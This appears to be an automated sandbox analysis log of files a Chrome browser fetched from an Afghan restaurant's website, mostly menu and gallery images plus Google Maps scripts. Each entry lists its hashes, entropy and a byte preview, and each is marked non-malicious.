                                                                                                                                                    MD5:46C2CF49E2D6887A745091E1A4B9469B
                                                                                                                                                    SHA1:993BAA8D199E70AF32AA487464BCCCE0463FD28F
                                                                                                                                                    SHA-256:CAB1AA7A489B063094499A4555CA093E8A5A7A9352EA49D0136ED695E64386C9
                                                                                                                                                    SHA-512:F8AE05552CE185E9896ED0921BB8EC518609C66DA5D6E1ED659E5E748DC416289E6E002327BC65D4CF897FB2C5A75DD7C11EF04F5D73CA585C351F4D548267E4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Tikka_Shish_Kabab.png
                                                                                                                                                    Preview:.PNG........IHDR..._...J......W......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):114
                                                                                                                                                    Entropy (8bit):4.802925647778009
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                    MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                    SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                    SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                    SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 60 x 51, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19306
                                                                                                                                                    Entropy (8bit):3.280100421018807
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:1SkkSKqRv+qHSfAIRXc06Egs9QwydK608+9i:UHSKpcPqs06Ey08+8
                                                                                                                                                    MD5:A459E2E1A972630B19FE5FD331328022
                                                                                                                                                    SHA1:C7FF8D81BABB659BE978316EAF4D33911983E885
                                                                                                                                                    SHA-256:3F5E0123B53D9D33AE3DF577B2747584DB8463A3E98AE958336DA1BB911325AF
                                                                                                                                                    SHA-512:214781B05EE33A4210048D4AF77EB76781FBA0881608FAAC0C8D82235241570864940E89ECEBE752CA65439F5DF956874249180B1C6056D6ED3E5A3C5BAEABFB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...<...3......k.....pHYs...............?.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <dc:creator>. <rdf:Seq>. <rdf:li>VectorStock.com/12168411</rdf:li>. </rdf:Seq>. </dc:creator>.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 599, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1211697
                                                                                                                                                    Entropy (8bit):7.975865190875511
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:yndx7HbH+uvYgjhyUyjqwsAW+06DvnQnDgU+nI7q8ihr7DNwh8:2dx77H+u5jwm1r+06DvwCnI+8ihD
                                                                                                                                                    MD5:3C061AF8A726738E427682A49EE06CAC
                                                                                                                                                    SHA1:3CD2AC613C8A70796409F0F06C462BEC7A4E3C4C
                                                                                                                                                    SHA-256:9843720493D3D041FB019E7B3F7D7C26C52802468333955477BB97151A49C5A3
                                                                                                                                                    SHA-512:04E798F36631C1EF0D613D460AEAD832F8ABA747C58F51A535DF130FBADFB05043A7C57C2EA62D6F875D60AA1818293B38B898469F639FCAC9F84A1CD96ACF3E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.......W...........pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 94 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):20691
                                                                                                                                                    Entropy (8bit):4.000849221230036
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:VktxJOfnk82zxPZ7RpjucX/8NO5d7A33M:mtxu2F9ju0/lTAs
                                                                                                                                                    MD5:59B641D34196B35FF0DEE310B35594B8
                                                                                                                                                    SHA1:8E7C233205DE55F526C848C8C7FC264FB1359F38
                                                                                                                                                    SHA-256:15956B3055CF55300316A60C607ABDD2A009EDBE54C65B39A1AD9CADC8250645
                                                                                                                                                    SHA-512:A7DAFE9224BC4B03C9646C8BEDDBFEDDF3251AA8040E22727B8AE78A155BED3F2289B513F7408C2AA43030C9106DBA2C7943D876309EC90BD898CF2B0B091529
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/icon3.png
                                                                                                                                                    Preview:.PNG........IHDR...^...d......3......pHYs...t...t..f.x..9.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T16:28:15+05:30</xmp:CreateDate>. <xmp:ModifyDate>2022-07-17T16:44:35+05:30</xmp:ModifyDate>. <xmp:M
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 87 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):39437
                                                                                                                                                    Entropy (8bit):6.022575783608269
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:0DdDih7U5e6V6ZL6FfjfUtzmJFkllwmN5uk:og6V698LfUHlLuk
                                                                                                                                                    MD5:48953B5CA34A61D3C89F0AED8EDD3E2D
                                                                                                                                                    SHA1:E40706619AED736B809F4DCB64D6655E8A87CC9E
                                                                                                                                                    SHA-256:8A61A08718E95D24A6E23B90D689A3B7C84814EF3C8D18ABB4BCC6D3E64E0B3E
                                                                                                                                                    SHA-512:DE96EB2388A7679AF7996491EED328C1E13A5DA572E9199F44CC1CECFEB1FA97087B73DCD0E7365F8BDD49F61FBD856DCCCF9694B77383945B260941150FB60E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...W...K.............pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (10639)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):234892
                                                                                                                                                    Entropy (8bit):5.647099979859235
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:A1hPTuFlPJ038r+G7Po9fsDB+ymJlC+RaWlKvLnF6YNgHeYA+jaL5hCw/3mQ:A1hPTuFlPJ038J7Po9EDBgJlC+RaWlKX
                                                                                                                                                    MD5:920D41FA24693EBB4C31BF55E33C2DEB
                                                                                                                                                    SHA1:FE018697BA60814059E09D4F3716DBC157EB6B91
                                                                                                                                                    SHA-256:3DFB0E0A7AAF30D82FE1361D5D44798E6B59CA12D6E3453BEA2539049DA545C0
                                                                                                                                                    SHA-512:A7B5D7A0CD2AB874F75B9AC33359A4DF3019F4D39C8B66BC9AACCC035888D4C71D7446ED681930D84EE9B4631F15B586E093AC290DA9481AF3670461D7C100D5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps/api/js?key=AIzaSyCtme10pzgKSPeJVJrG1O3tjR6lk98o4w8&callback=initMap
                                                                                                                                                    Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=988\u0026hl=en-US\u0026"],null,null,null,1,"988",["https://khms0.google.com/kh?v=988\u0026hl=en-US\u0026","https://khms1.google.com/kh?v=988\u0026hl=en-US\u0026"]],null,null,null,null,[["https://cbks0.googleapis.com/cbk?","https://cbks1.googleapis.com/cbk?"]],[["https://khms0.googleapis.com/kh?v=163\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=163\u0026hl=en-US\u0026"],null,null,null,null,"163",["https://khms0.google.com/kh?v=163\u0026hl=en-US\u0026","https://khms1.google.com/kh?v=163\u0026hl=en-US\u0026"]],null,null,null,null,null,null,null,[["https://streetv
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (10616)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11766
                                                                                                                                                    Entropy (8bit):5.938816751494987
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:2IGIsmhPhuKILOUPvROGXNX1INFa2sVCR/Ib0j3X+mavMPW+pPo8tvFDegG/RmwV:lVsmDuzL7PJOGXNX2NFa2sVCR/Ib0j3C
                                                                                                                                                    MD5:EA8A97987AF53866E9CEDB2ADA054CA2
                                                                                                                                                    SHA1:C163E87ED53B050B073D295A5536F730A48833C5
                                                                                                                                                    SHA-256:9B885AD6D555F7BE095945A9F0720E35E1562743D1C6FC511476118F9F0E6397
                                                                                                                                                    SHA-512:2C533378A1DAE6C3940BA36CA8D520B0F77641FD1096B107A27A4F54DC57178CD2DA952DDEC9C58C003F0D1528806B5A8B6D1F41E4EF027102FB92CB626452E9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. var rules = {. createHTML: function(src) {. return src;. },. createScriptURL: function(src) {. return src;. }. };. var ttPolicy;. . try {. ttPolicy = window.trustedTypes.createPolicy('google-maps-api-loader', rules);. } catch(e) {. ttPolicy = rules;. }. . function getScript(src) {. var a, nonce = ((a = document.querySelector("script[nonce]")) == null ? void 0 : a.nonce) || "";. var s = document.createElement('script');. . s.src = ttPolicy.createScriptURL(src);. s.nonce = nonce;. document.head.appendChild(s);. }. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en\u0026","https://khms1.googleapis.com/kh?v=988\u00
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 1105x831, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):370443
                                                                                                                                                    Entropy (8bit):7.971610840142179
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:vF6btZKkeBTP4/yGhrkveZqpHsATDhdSn+q06MeNKMf1/s0quBUZAZWFcpAbMW:ohFVyMr2KqpHXrosd/mFs0quBUZAwFcq
                                                                                                                                                    MD5:4ED035C4C57D29721EBBD7774B045823
                                                                                                                                                    SHA1:1B5BB03F93019055345559DED941EB069FAC224E
                                                                                                                                                    SHA-256:8DA940508CDAE66F5148AAD9542B2D4FAFCB5816B79EAE228A74110165A44E7C
                                                                                                                                                    SHA-512:442F0DB986D63D9E5A4C2983A6D5BC9BA0A0F0EFF4FBAA3CBE447F7FC6904AB7FC70D5E152DA88D6DB598A679A085643189455B47F5578E3DE744E11439A4815
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/res_menu3.jpg
                                                                                                                                                    Preview:....#.Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:07:37....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................65..........65..........65..........0100.......................Q...........?.................................................................................................0...........1...........2..........4..........5.................................P...-....2023:08:19 14:35:06.2023:08:19 14:35:06.+10:00.+10:00.+10:00...`.......`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 700x373, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):76092
                                                                                                                                                    Entropy (8bit):7.883268706692136
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:ikpcWNmfH4o8RRA4TgYhPDsgSe01+79b+:/cWNDoGRA24gr+
                                                                                                                                                    MD5:8C4A7C6AE85F0C9A308E7B3AE6F92FE4
                                                                                                                                                    SHA1:B0B6CC1FCE23EE90312053B937007809DD2403A1
                                                                                                                                                    SHA-256:334B3EFB27EB117283BD51199E91E8B22F237018755CD58766B12EAA45CC5049
                                                                                                                                                    SHA-512:AD28520935A47AE3490D247A995E3E5FD1A639BDF4F0D5C0E957A2AE06B8A2A2078D2F02F3E140A5193C3B349794308E4D7C5FFB640F6A95AB8E4CCD441CA3C7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.....vExif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:15:39.............0221...................................u...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................U...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.........gS..:)SC[.G.#O.|..+U...4....Iq:}...IH.7.......[>?-?....9.,..w!.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):195846
                                                                                                                                                    Entropy (8bit):7.956268982547781
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:pkk7kkfkOZLWTr2U2EaBRFmS4G/f0Z5eHot0qgDzHWaI6tJfEDVD/DlFNmJrt5Ke:pPbkOHpXBRFmS4G/f0zethzHR4VdmVGe
                                                                                                                                                    MD5:E49859DC22ED1A21101CEC386BE81C69
                                                                                                                                                    SHA1:40477513D80E718D4BA5DA69972CD48EB6401940
                                                                                                                                                    SHA-256:CDA4AFCE433498366BB76FF27C118951FA3AD5E94C203F34BD9EE770AE40E58A
                                                                                                                                                    SHA-512:0583B4F0CEA63A0D18384A6B8D9E537265AD0020C23AFE10275D9F769CE32BCF78ADB2921FF2A4F30D86EA14E13FBDFF83D4F6FBE95734B12A49307D5ED4C602
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:19:17.............0221...................................................................r...........z.(................................-........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..{...x....w!l..Z w'...a...#^AS...;...k..$^..m....cE...s.......X,`......o..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):210528
                                                                                                                                                    Entropy (8bit):7.962338833142009
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:ScylItQq6H/544/EYKt3HI8RI7TWvCpYcCYBXiBSpbNGpLdMBPkEHeUNXn4:SczqK4MYoZRI7K2YcXBXfbK8kE+U5n4
                                                                                                                                                    MD5:1CDB0B52F0B72558B22AEF5B60B054A5
                                                                                                                                                    SHA1:396757851DBF3929B77FFA049F7073919F4A7211
                                                                                                                                                    SHA-256:58DF087623D26C8A2E9916C132FD2B0F8777C7A939B92C47AEC0AC631FB15F69
                                                                                                                                                    SHA-512:79EA275AA7253DA51CCDF38A95D16D236E666F39D2354DCE5668DEEBFBBF7D02C3C3C232E7025C88D33A5082C7EA65C3473692009AC9EF38ABE26F9DA3B7DC74
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....1.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2.......................i.............T............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:26:32.............0221....................0100.............................................................................................(................................0........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..c^H.o.Sk.......'h.`.....
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 290x290, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):46125
                                                                                                                                                    Entropy (8bit):7.660388171094493
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:RontNcvC9+7DtNcvC9WL8lYy6BmLXNz8BiqP9RyNZ6jez4Yo724n1:RotNN9+NN9pl+IXh8p81Yy4n1
                                                                                                                                                    MD5:A9B5B9537850FC450D87B1D69B880FC5
                                                                                                                                                    SHA1:6CE95C479A268D8B19CAF6B4C92B37430D1496BC
                                                                                                                                                    SHA-256:66E64B9C265F8801B5F4CF589BFFAA83D986F29BAB9E4750DB17F3A1D2CA8655
                                                                                                                                                    SHA-512:65B41E0A3114B10712ECF979E88F05A4D4A2DE9CF6195C593EC1B41A801259A592B3D3D6D152FB2FF93455D5A8B18BF1237D243A17E2141D7CDEE97A77911EE6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.... .Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 19:51:55....)...........2...........:."...........'...........0...........2.................0231...........B...........V...........j...........q...........x........................................................................................................46..........46..........46..........0100......................."...........".................................................................................................0...........1...........2..........4..........5.................................<...-....2023:08:19 16:29:34.2023:08:19 16:29:34.+10:00.+10:00.+10:00...........`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 599, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):1211697
                                                                                                                                                    Entropy (8bit):7.975865190875511
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:yndx7HbH+uvYgjhyUyjqwsAW+06DvnQnDgU+nI7q8ihr7DNwh8:2dx77H+u5jwm1r+06DvwCnI+8ihD
                                                                                                                                                    MD5:3C061AF8A726738E427682A49EE06CAC
                                                                                                                                                    SHA1:3CD2AC613C8A70796409F0F06C462BEC7A4E3C4C
                                                                                                                                                    SHA-256:9843720493D3D041FB019E7B3F7D7C26C52802468333955477BB97151A49C5A3
                                                                                                                                                    SHA-512:04E798F36631C1EF0D613D460AEAD832F8ABA747C58F51A535DF130FBADFB05043A7C57C2EA62D6F875D60AA1818293B38B898469F639FCAC9F84A1CD96ACF3E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/Banner_take_image.png
                                                                                                                                                    Preview:.PNG........IHDR.......W...........pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):230393
                                                                                                                                                    Entropy (8bit):7.955511657686626
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:61R1S6jvvtV1STrBUJbd+iUcMRDFEkLwjjmDsBZ:63QSiBUJbd+irMRDFEvjuk
                                                                                                                                                    MD5:75D6E3EBEBBCDE6515E4CB93E9A7A690
                                                                                                                                                    SHA1:D13C2221E7F318F3CF511C5C26AE8B659E70332E
                                                                                                                                                    SHA-256:645007265CDB75D27B4280187324934A1EC0CB0BF6AE43D7B8143433F6CE597E
                                                                                                                                                    SHA-512:83BE394AF0D578BD31AF8115FDE1CD9739CC948F1F198EF6CA5DC9B038416D3B08357C8C92FE3FB17533CB080DF561AE68B5924E652329DA8CAFC7BEDDA4B766
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_N4.jpg
                                                                                                                                                    Preview:....$.Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:41:47....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................49..........49..........49..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................P........2023:08:19 16:48:45.2023:08:19 16:48:45.+10:00.+10:00.+10:00...`..........................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1066, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):157537
                                                                                                                                                    Entropy (8bit):7.950558349142844
                                                                                                                                                    Encrypted:false
